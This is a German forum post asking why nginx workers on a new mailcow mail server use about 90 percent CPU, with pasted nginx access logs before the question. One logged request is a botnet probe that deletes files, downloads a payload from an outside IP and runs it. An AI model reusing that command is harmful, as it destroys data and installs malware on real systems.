200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:57:10 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 178.197.239.61 - - [21/May/2024:23:57:10 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:57:23 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:57:32 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | fd4d:6169:6c63:6f77::d - - [21/May/2024:23:57:42 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:57:42 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:58:05 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:58:07 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 178.197.239.61 - - [21/May/2024:23:58:10 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | fd4d:6169:6c63:6f77::d - - [21/May/2024:23:58:32 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:58:32 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:58:38 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:59:00 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 178.197.239.61 - - [21/May/2024:23:59:10 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:59:13 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:59:13 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.13 - - [21/May/2024:23:59:54 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 172.22.1.9 - - [21/May/2024:23:59:57 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 178.197.239.61 - - [22/May/2024:00:00:10 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | 172.22.1.9 - - [22/May/2024:00:00:13 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [22/May/2024:00:00:13 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.13 - - [22/May/2024:00:00:17 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 172.22.1.9 - - [22/May/2024:00:00:55 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | fd4d:6169:6c63:6f77::d - - [22/May/2024:00:01:07 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | fd4d:6169:6c63:6f77::d - - [22/May/2024:00:01:07 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 178.197.239.61 - - [22/May/2024:00:01:10 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | 172.22.1.13 - - [22/May/2024:00:01:12 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 172.22.1.9 - - [22/May/2024:00:01:26 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [22/May/2024:00:01:43 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [22/May/2024:00:01:43 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.13 - - [22/May/2024:00:02:05 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 101.17.208.150 - - [22/May/2024:00:02:08 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+45.128.232.15/jaws;sh+/tmp/jaws HTTP/1.1" 404 146 "-" "Hello, world" nginx-mailcow-1 | 178.197.239.61 - - [22/May/2024:00:02:10 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | 172.22.1.9 - - [22/May/2024:00:02:16 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | fd4d:6169:6c63:6f77::d - - [22/May/2024:00:02:16 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [22/May/2024:00:02:18 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [22/May/2024:00:02:55 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.13 - - [22/May/2024:00:02:56 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 178.197.239.61 - - [22/May/2024:00:03:10 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | 172.22.1.9 - - [22/May/2024:00:03:13 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [22/May/2024:00:03:13 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [22/May/2024:00:03:35 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [22/May/2024:00:03:47 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [22/May/2024:00:03:47 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.13 - - [22/May/2024:00:03:59 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 178.197.239.61 - - [22/May/2024:00:04:10 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | 172.22.1.9 - - [22/May/2024:00:04:10 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [22/May/2024:00:04:23 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [22/May/2024:00:04:23 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.13 - - [22/May/2024:00:04:32 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 172.22.1.9 - - [22/May/2024:00:04:47 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [22/May/2024:00:05:04 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | fd4d:6169:6c63:6f77::d - - [22/May/2024:00:05:04 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 178.197.239.61 - - [22/May/2024:00:05:10 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | 172.22.1.13 - - [22/May/2024:00:05:18 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 172.22.1.9 - - [22/May/2024:00:05:26 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | fd4d:6169:6c63:6f77::d - - [22/May/2024:00:05:43 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [22/May/2024:00:05:43 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 178.197.239.61 - - [22/May/2024:00:06:10 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | 172.22.1.9 - - [22/May/2024:00:06:11 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [22/May/2024:00:06:24 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [22/May/2024:00:06:24 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.13 - - [22/May/2024:00:06:31 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 172.22.1.9 - - [22/May/2024:00:06:56 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 178.197.239.61 - - [22/May/2024:00:07:10 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | fd4d:6169:6c63:6f77::d - - [22/May/2024:00:07:14 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [22/May/2024:00:07:14 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [22/May/2024:00:07:32 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.13 - - [22/May/2024:00:07:50 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 172.22.1.9 - - [22/May/2024:00:07:58 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | fd4d:6169:6c63:6f77::d - - [22/May/2024:00:07:58 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 202.239.5.77 - - [22/May/2024:00:08:04 +0200] "GET /api/liverate/public/scripts/api.js HTTP/1.1" 404 178 "https://www.sternen.ch/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; Y!J-WSC/1.0; +https://yahoo.jp/3BSZgF) Chrome/120.0.0.0 Safari/537.36" nginx-mailcow-1 | 172.22.1.9 - - [22/May/2024:00:08:04 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 178.197.239.61 - - [22/May/2024:00:08:10 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | 172.22.1.9 - - [22/May/2024:00:08:35 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | fd4d:6169:6c63:6f77::d - - [22/May/2024:00:08:35 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.13 - - [22/May/2024:00:08:47 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 172.22.1.9 - - [22/May/2024:00:08:54 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 178.197.239.61 - - [22/May/2024:00:09:10 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | 172.22.1.9 - - [22/May/2024:00:09:21 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [22/May/2024:00:09:21 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [22/May/2024:00:09:48 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.13 - - [22/May/2024:00:10:01 +0200] "GET / HTTP/1.1" 200 15 "-" "check_http/v (nagios-plugins 2.4.5)" nginx-mailcow-1 | 178.197.239.61 - - [22/May/2024:00:10:10 +0200] "GET /api/liverate/public/scripts/api.js HTTP/2.0" 404 167 "https://www.hotel-mont-blanc.ch/fr" "Mozilla/5.0 (SMART-TV; LINUX; Tizen 6.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.93 TV Safari/537.36" nginx-mailcow-1 | 172.22.1.9 - - [22/May/2024:00:10:15 +0200] "HEAD /forwardinghosts.php HTTP/1.1" 200 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [22/May/2024:00:10:15 +0200] "GET /forwardinghosts.php HTTP/1.1" 200 27 "-" "rspamd-3.7.5" nginx-mailcow-1 | 172.22.1.9 - - [22/May/2024:00:10:34 +0200] "HEAD /settings.php HTTP/1.1" 304 0 "-" "rspamd-3.7.5" nginx-mailcow-1 | 66.249.66.166 - - [22/May/2024:00:10:45 +0200] "GET /api/liverate/public/scripts/api.js HTTP/1.1" 404 178 "https://villa-hammerschmiede.de/" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.201 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" nginx-mailcow-1 | 152.39.198.139 - - [22/May/2024:00:16:17 +0200] "GET /api/liverate/public/scripts/api.be.synxis.js HTTP/2.0" 404 167 "https://be.synxis.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4691.0 Safari/537.36"
Hallo zusammen,
ich habe 2 Mailcow Server aufgesetzt.
Beide nach der Standartinstallation in der offiziellen Doku.- Der erste zum testen und etwas herumspielen mit 2 CPU Kernen und 4GB RAM. Dieser läuft bestens - CPU ist durchgängig im Leerlauf bei ca. 3-5%
- Der zweite ist neu und sollte jetzt der Produktive für meine Familie werden (4 CPU Kerne und 8GB RAM). So weit läuft auch alles, allerdings ist die CPU Last durchgängig im Leerlauf bei ca. 90%
Jetzt habe ich mal nachgeschaut und im HTOP zeigt der mir, dass die Nginx worker prozesse die ganze Last verursachen.
Mit Nginx kenne ich mich allerdings kaum aus und habe auch im Internet kaum was zu diesem Fehler gefunden, was kann ich da machen?
Im Moment ist der Server noch komplett default eingestellt, lediglich die komplette DNS Konfiguration und die Domain ist angelegt, aber noch kein Postfach.
Ich bin für jede Hilfe dankbar!